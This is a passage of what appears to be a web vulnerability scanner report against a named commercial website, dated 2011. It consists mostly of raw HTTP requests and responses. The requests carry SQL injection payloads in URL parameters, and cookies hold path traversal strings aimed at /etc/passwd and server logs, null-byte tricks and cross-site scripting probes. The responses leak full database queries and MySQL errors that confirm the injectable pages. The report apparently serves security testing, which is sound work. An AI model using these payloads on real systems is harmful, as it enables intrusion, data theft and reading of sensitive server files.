OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:29:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=evflpkkihckjvokf3onkcekcl6; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/dima00/project.php

/ppc/leadflow/dima00/project.php

http://www.insideup.com/ppc/leadflow/dima00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/dima00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:30:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=88ulg04btkiuje7o0bi9imeqk7; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/dima00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/hins00/project.php

/ppc/leadflow/hins00/project.php

http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 50002
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2sbtagus4fhiuntou2ctogm7j1; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/cace00/project.php

/ppc/leadflow/cace00/project.php

http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3bbbi1f23mkeoo56djlte5l3t0; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM 